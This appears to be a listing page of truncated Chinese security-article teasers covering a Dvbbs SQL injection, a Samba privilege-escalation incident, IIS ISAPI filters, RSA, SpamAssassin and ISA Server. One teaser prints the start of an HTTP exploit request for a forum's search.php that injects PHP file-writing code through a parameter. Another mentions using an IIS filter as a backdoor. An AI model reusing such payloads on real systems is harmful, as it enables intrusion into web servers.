一、概述   漏洞介绍：http://coolersky.com/leak/programme/bbs/2006/0515/515.html   前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了，一直也没时间看看，下午跟Edward要了个链接看了看：http://www.eviloctal.com/forum/read.php?tid=22074   本站转贴为：http://coolersky.com/articles/hack/analysis/programme/2006/05...

FFFFFF FFFFCC FFFF99 FFFF66 FFFF33 FFFF00 CCFFFF CCFFCC CCFF99 CCFF66 CCFF33 CCFF00 99FFFF 99FFCC 99FF99 99FF66 99FF33 99FF00 66FFFF 66FFCC 66FF99 66FF66 66FF33 66FF00 33FFFF ...

 引言  RSA密码系统是较早提出的一种公开钥密码系统。1978年，美国麻省理工学院（MIT）的Rivest,Shamir和Adleman在题为《获得数字签名和公开钥密码系统的方法》的论文中提出了基于数论的非对称(公开钥)密码体制，称为RSA密码体制。RSA是建立在“大整数的素因子分解是困难问题”基础上的，是一种分组密码体制。  介绍公钥密码体制（背景）  1、对称密码体制  对称密码体制是一种传统密码体制，也称为私钥密码体制。在对称加密系统...

从近日对被黑服务器的安全分析来看，我找到该用户提升权限的工具。他是利用了Samba的安全漏洞提升为了ROOT。这几天服务器因为要放到公网测试，此时又安装了Samba服务器。结果第二天就发现了服务器被黑Samba是在Redhat Linux 9上默认的版本。使用了该黑客的强大的exploit工具提升为了root。提升为root，只需要短短的3秒钟自己汗一个从服务器的tmp查找到一个x2k3的目录[bob@learnin9 tmp]$ cd x2k3/[bob@learnin9 x2k3]$ lsbind ftp&nb...

一.前言二.申明三.实现四.参考一.前言    最近的sql injection攻击很流行，一般的解决方法是使用通用的防注入函数来保护程序不受威胁。但是有写些序作者经常忘记包含通用函数，导致没有效果。前些日子研究彻底防止SQL Injection攻击时，看了些IIS5的ISAPI Filter文档，决定利用IIS提供的API接口做个东西，这样可以很好的防止sql injection攻击。    凑巧发现，这样依附在IIS上面的扩展模块，还可以作为别的用处，比如作为一个后门程序...

看到网上有类似的工具，但分析的文章却没找到，听小黑说黑客手册上有，可惜偶没有杂志，所以就抓包然后看下代码，大致分析了一下。这个漏洞很巧妙、也很经典 ：）   GET /search.php?keyword=By%20CN911&cachefile=an85.php%2500&treadinfo=〈?fputs(fop  en(chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(98).chr(98).chr(115).chr(...

这里我们只讲SpamAssassin的简单应用，就是利用SpamAssassin的规则集把垃圾邮件标注为垃圾邮件，然后在客户端outlook用策略把带有垃圾邮件字符的邮件自动转移到垃圾邮件目录。参看文章CCERT中文垃圾邮件过滤规则集(http://www.ccert.edu.cn/spam/sa/Chinese_rules.htm)试验环境：redhat9.0前提条件：已经安装好qmail，本文已经搭建的环境是qmail+vpopmail+igeus1：安装SpamAssassin安装方法1：直接通过CPAN安装perl -MCPAN -e shell ...

Currently, Samba can go beyond merely emulating Windows shares to actually acting as the Primary Domain Controller for your Windows network. Of course, Samba can also bec...

在 ISA Server 2004 中虽然可以通过修改源文件来自定义表单登录界面，但是这样是不受微软支持的。在 ISA Server 2006 中虽然微软同样不对表单自定义提供技术支持，但是提供了自定义登录表单的功能，你现在可以发挥你的想像力和图像处理技术，把千篇一律的登录表单给修改一下，做出你自己的特色。 ISA Server 2006 安装时自带了两个登录表单模板，分别用于 Exchange OWA 登录和其他 情况下的表单登录，H...

ISA Server 的故障排除工具　　 10.1.3　练习：测试端口状态 　　　　 在这个练习中，您需要使用Netstat和Telnet命令来断定ISA Server计算机的端口状态。此技术可用来验证安全或用来断定ISA Server计算机上运行的服务对外部站点是否　　可用。 　　 练习：测试ISA Server端口 　　　　 在这个练习中，在命令提示符中运行Netstat实用程序，并注意ISA Server的外部接口上打开了不同的端口。 　　 ...

ISAServer的故障排除工具　　10.1.1.6网络监视器　　　　网络监视器或Netmon是用来捕获与显示Windows2000从局域网接收的帧内容的工具。为了简化网络通信分析，网络监视器分化组合了40个常用的网络协议。这意味对大多数网络通信而言，网络监视器实际上显示了与网络会话相关的所有信息，包括源和目的端口和地址、服务器响应、有效通信等。　　　　下面是来自网络监视器跟踪文件或捕获的帧内容示例：　　NetworkMonitortraceWed03/07/200108:55:17AMCapture1.TXT　　Frame:BaseFrameProperties　　ETHERNET:ETYP...